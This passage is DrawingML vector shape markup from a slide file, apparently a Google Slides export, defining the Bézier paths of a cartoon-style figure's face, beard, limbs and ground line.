                    <a:pt x="0" y="1223"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="536"/>
                    <a:pt x="784" y="318"/>
                    <a:pt x="1254" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1565" y="318"/>
                    <a:pt x="1836" y="414"/>
                    <a:pt x="1941" y="533"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1941" y="533"/>
                    <a:pt x="1715" y="116"/>
                    <a:pt x="1072" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="984" y="6"/>
                    <a:pt x="900" y="0"/>
                    <a:pt x="820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Google Shape;87;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1852779" y="1956520"/>
              <a:ext cx="179080" cy="223443"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4400" h="5490" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1625" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="544" y="0"/>
                    <a:pt x="1" y="1081"/>
                    <a:pt x="185" y="2475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="3818"/>
                    <a:pt x="1306" y="5489"/>
                    <a:pt x="2294" y="5489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2436" y="5489"/>
                    <a:pt x="2579" y="5455"/>
                    <a:pt x="2721" y="5380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3638" y="4904"/>
                    <a:pt x="4400" y="4094"/>
                    <a:pt x="4209" y="2570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3995" y="1034"/>
                    <a:pt x="3197" y="284"/>
                    <a:pt x="1971" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1850" y="11"/>
                    <a:pt x="1735" y="0"/>
                    <a:pt x="1625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Google Shape;88;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1874798" y="1956764"/>
              <a:ext cx="79039" cy="49613"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1942" h="1219" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1099" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1026" y="0"/>
                    <a:pt x="949" y="5"/>
                    <a:pt x="870" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="124"/>
                    <a:pt x="1" y="540"/>
                    <a:pt x="1" y="540"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="420"/>
                    <a:pt x="383" y="321"/>
                    <a:pt x="699" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1167" y="321"/>
                    <a:pt x="1722" y="537"/>
                    <a:pt x="1942" y="1219"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1787" y="136"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1787" y="136"/>
                    <a:pt x="1491" y="0"/>
                    <a:pt x="1099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Google Shape;89;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1948953" y="1581881"/>
              <a:ext cx="628530" cy="659544"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="15443" h="16205" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7728" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3453" y="0"/>
                    <a:pt x="1" y="2750"/>
                    <a:pt x="1" y="8477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="12752"/>
                    <a:pt x="3453" y="16204"/>
                    <a:pt x="7728" y="16204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11990" y="16204"/>
                    <a:pt x="15443" y="12752"/>
                    <a:pt x="15443" y="8477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15443" y="2870"/>
                    <a:pt x="11978" y="0"/>
                    <a:pt x="7728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Google Shape;90;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1947976" y="1926891"/>
              <a:ext cx="629507" cy="577777"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="15467" h="14196" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="15467" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="4156"/>
                    <a:pt x="1" y="7608"/>
                    <a:pt x="1584" y="9859"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2489" y="11156"/>
                    <a:pt x="4775" y="13419"/>
                    <a:pt x="6537" y="14038"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6813" y="14132"/>
                    <a:pt x="7390" y="14196"/>
                    <a:pt x="7901" y="14196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8228" y="14196"/>
                    <a:pt x="8528" y="14170"/>
                    <a:pt x="8704" y="14109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10490" y="13514"/>
                    <a:pt x="12943" y="11192"/>
                    <a:pt x="13895" y="9847"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15467" y="7597"/>
                    <a:pt x="15467" y="4144"/>
                    <a:pt x="1546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Google Shape;91;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2346794" y="2016511"/>
              <a:ext cx="137647" cy="28287"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3382" h="695" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2477" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2191" y="25"/>
                    <a:pt x="1918" y="37"/>
                    <a:pt x="1656" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1382" y="120"/>
                    <a:pt x="1120" y="168"/>
                    <a:pt x="846" y="239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="584" y="322"/>
                    <a:pt x="334" y="406"/>
                    <a:pt x="72" y="513"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="537"/>
                    <a:pt x="1" y="584"/>
                    <a:pt x="36" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="670"/>
                    <a:pt x="89" y="695"/>
                    <a:pt x="138" y="695"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="695"/>
                    <a:pt x="157" y="694"/>
                    <a:pt x="167" y="692"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="620"/>
                    <a:pt x="667" y="549"/>
                    <a:pt x="929" y="501"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="453"/>
                    <a:pt x="1441" y="394"/>
                    <a:pt x="1703" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1965" y="334"/>
                    <a:pt x="2215" y="299"/>
                    <a:pt x="2489" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2751" y="263"/>
                    <a:pt x="3013" y="263"/>
                    <a:pt x="3275" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3334" y="263"/>
                    <a:pt x="3382" y="215"/>
                    <a:pt x="3382" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3382" y="108"/>
                    <a:pt x="3346" y="61"/>
                    <a:pt x="3287" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3025" y="25"/>
                    <a:pt x="2739" y="1"/>
                    <a:pt x="2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Google Shape;92;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2023596" y="2020541"/>
              <a:ext cx="137159" cy="19780"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3370" h="486" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1280" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1143" y="0"/>
                    <a:pt x="1006" y="3"/>
                    <a:pt x="869" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="607" y="21"/>
                    <a:pt x="334" y="69"/>
                    <a:pt x="72" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="128"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="283"/>
                    <a:pt x="36" y="319"/>
                    <a:pt x="95" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="307"/>
                    <a:pt x="619" y="283"/>
                    <a:pt x="893" y="283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1155" y="283"/>
                    <a:pt x="1405" y="283"/>
                    <a:pt x="1679" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1941" y="307"/>
                    <a:pt x="2203" y="343"/>
                    <a:pt x="2465" y="366"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2715" y="402"/>
                    <a:pt x="2989" y="438"/>
                    <a:pt x="3239" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3298" y="485"/>
                    <a:pt x="3358" y="462"/>
                    <a:pt x="3346" y="426"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3370" y="366"/>
                    <a:pt x="3346" y="307"/>
                    <a:pt x="3286" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3024" y="200"/>
                    <a:pt x="2762" y="140"/>
                    <a:pt x="2489" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2227" y="57"/>
                    <a:pt x="1965" y="21"/>
                    <a:pt x="1691" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1554" y="3"/>
                    <a:pt x="1417" y="0"/>
                    <a:pt x="1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Google Shape;93;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2191728" y="2273977"/>
              <a:ext cx="142979" cy="31909"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3513" h="784" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1818" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1245" y="0"/>
                    <a:pt x="655" y="66"/>
                    <a:pt x="405" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="402"/>
                    <a:pt x="1298" y="783"/>
                    <a:pt x="1739" y="783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2203" y="783"/>
                    <a:pt x="3513" y="438"/>
                    <a:pt x="3096" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2893" y="60"/>
                    <a:pt x="2363" y="0"/>
                    <a:pt x="1818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Google Shape;94;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2206258" y="2424565"/>
              <a:ext cx="115385" cy="10216"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2835" h="251" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1382" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1013" y="0"/>
                    <a:pt x="1" y="131"/>
                    <a:pt x="346" y="238"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="238"/>
                    <a:pt x="906" y="155"/>
                    <a:pt x="1370" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1834" y="155"/>
                    <a:pt x="2501" y="250"/>
                    <a:pt x="2501" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2835" y="155"/>
                    <a:pt x="1775" y="12"/>
                    <a:pt x="1382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Google Shape;95;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2151028" y="2349067"/>
              <a:ext cx="225844" cy="30077"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5549" h="739" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2311" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1737" y="1"/>
                    <a:pt x="1046" y="324"/>
                    <a:pt x="490" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="324"/>
                    <a:pt x="144" y="290"/>
                    <a:pt x="1" y="200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="526"/>
                    <a:pt x="1696" y="739"/>
                    <a:pt x="3033" y="739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4187" y="739"/>
                    <a:pt x="5284" y="581"/>
                    <a:pt x="5549" y="200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5549" y="200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5406" y="290"/>
                    <a:pt x="5240" y="324"/>
                    <a:pt x="5061" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4507" y="324"/>
                    <a:pt x="3822" y="1"/>
                    <a:pt x="3249" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3097" y="1"/>
                    <a:pt x="2954" y="23"/>
                    <a:pt x="2822" y="81"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2739" y="81"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2608" y="23"/>
                    <a:pt x="2463" y="1"/>
                    <a:pt x="2311" y="1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Google Shape;96;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2164093" y="2364940"/>
              <a:ext cx="202116" cy="38258"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4966" h="940" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="259"/>
                    <a:pt x="1409" y="931"/>
                    <a:pt x="2147" y="931"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2258" y="931"/>
                    <a:pt x="2362" y="916"/>
                    <a:pt x="2454" y="882"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2584" y="922"/>
                    <a:pt x="2712" y="939"/>
                    <a:pt x="2838" y="939"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3651" y="939"/>
                    <a:pt x="4389" y="211"/>
                    <a:pt x="4966" y="36"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4966" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2454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Google Shape;97;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2202880" y="2371737"/>
              <a:ext cx="114408" cy="12658"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2811" h="311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632" y="84"/>
                    <a:pt x="2370" y="131"/>
                    <a:pt x="2096" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1917" y="179"/>
                    <a:pt x="1715" y="262"/>
                    <a:pt x="1524" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1322" y="262"/>
                    <a:pt x="1096" y="167"/>
                    <a:pt x="893" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="560" y="119"/>
                    <a:pt x="251" y="72"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="12"/>
                    <a:pt x="746" y="310"/>
                    <a:pt x="1482" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1496" y="310"/>
                    <a:pt x="1510" y="310"/>
                    <a:pt x="1524" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2274" y="310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Google Shape;98;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2625914" y="3196473"/>
              <a:ext cx="88238" cy="491900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2168" h="12086" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="453" y="7013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072" y="7299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1370" y="12085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1644" y="6406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="6299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="6299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1191" y="64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Google Shape;99;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1769181" y="3196473"/>
              <a:ext cx="114408" cy="573300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2811" h="14086" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="386" y="6230"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="6230"/>
                    <a:pt x="369" y="6240"/>
                    <a:pt x="369" y="6240"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="410" y="6247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410" y="6247"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="401" y="6234"/>
                    <a:pt x="393" y="6230"/>
                    <a:pt x="386" y="6230"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2810" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1620" y="6478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410" y="6247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410" y="6247"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="447" y="6299"/>
                    <a:pt x="498" y="6496"/>
                    <a:pt x="512" y="7168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="608" y="9847"/>
                    <a:pt x="0" y="14086"/>
                    <a:pt x="0" y="14086"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1131" y="7299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155" y="7299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Google Shape;100;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2563888" y="2040768"/>
              <a:ext cx="37851" cy="96947"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="930" h="2382" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="274" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="2382"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2382"/>
                    <a:pt x="870" y="1655"/>
                    <a:pt x="906" y="1286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="929" y="917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Google Shape;101;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1301539" y="4483026"/>
              <a:ext cx="1885590" cy="50427"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="46329" h="1239" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="144" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="1"/>
                    <a:pt x="1" y="84"/>
                    <a:pt x="1" y="155"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="1096"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1167"/>
                    <a:pt x="72" y="1239"/>
                    <a:pt x="144" y="1239"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46173" y="1239"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="46257" y="1239"/>
                    <a:pt x="46328" y="1167"/>
                    <a:pt x="46328" y="1096"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46328" y="155"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="46328" y="84"/>
                    <a:pt x="46257" y="1"/>
                    <a:pt x="46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Google Shape;102;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2077361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Google Shape;103;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2366168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Google Shape;104;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1929742" y="2140726"/>
              <a:ext cx="654537" cy="389499"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="16082" h="9570" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="65" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1"/>
                    <a:pt x="89" y="603"/>
                    <a:pt x="615" y="2759"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1782" y="7605"/>
                    <a:pt x="7259" y="9570"/>
                    <a:pt x="8224" y="9570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9188" y="9570"/>
                    <a:pt x="10462" y="8724"/>
                    <a:pt x="13141" y="6557"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15820" y="4379"/>
                    <a:pt x="16082" y="735"/>
                    <a:pt x="16082" y="735"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16082" y="735"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15394" y="1695"/>
                    <a:pt x="13549" y="3294"/>
                    <a:pt x="11894" y="3294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11372" y="3294"/>
                    <a:pt x="10869" y="3135"/>
                    <a:pt x="10426" y="2747"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9496" y="1926"/>
                    <a:pt x="9035" y="1527"/>
                    <a:pt x="8522" y="1527"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8016" y="1527"/>
                    <a:pt x="7459" y="1914"/>
                    <a:pt x="6354" y="2664"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5759" y="3071"/>
                    <a:pt x="5130" y="3239"/>
                    <a:pt x="4511" y="3239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2812" y="3239"/>
                    <a:pt x="1179" y="1982"/>
                    <a:pt x="473" y="961"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="473" y="961"/>
                    <a:pt x="146" y="1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Google Shape;105;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2004183" y="2745807"/>
              <a:ext cx="51404" cy="251567"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1263" h="6181" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="2025"/>
                    <a:pt x="775" y="4097"/>
                    <a:pt x="1263" y="6180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Google Shape;106;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2428683" y="2748249"/>
              <a:ext cx="83394" cy="379446"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2049" h="9323" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2049" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1799" y="1489"/>
                    <a:pt x="775" y="2727"/>
                    <a:pt x="418" y="4251"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="6037"/>
                    <a:pt x="287" y="7561"/>
                    <a:pt x="656" y="9323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Google Shape;107;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2445166" y="3074374"/>
              <a:ext cx="10704" cy="53317"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="263" h="1310" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="263" y="1310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Google Shape;108;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1893723" y="1701334"/>
              <a:ext cx="707040" cy="741188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="17372" h="18211" extrusionOk="0">
                  <a:moveTo>
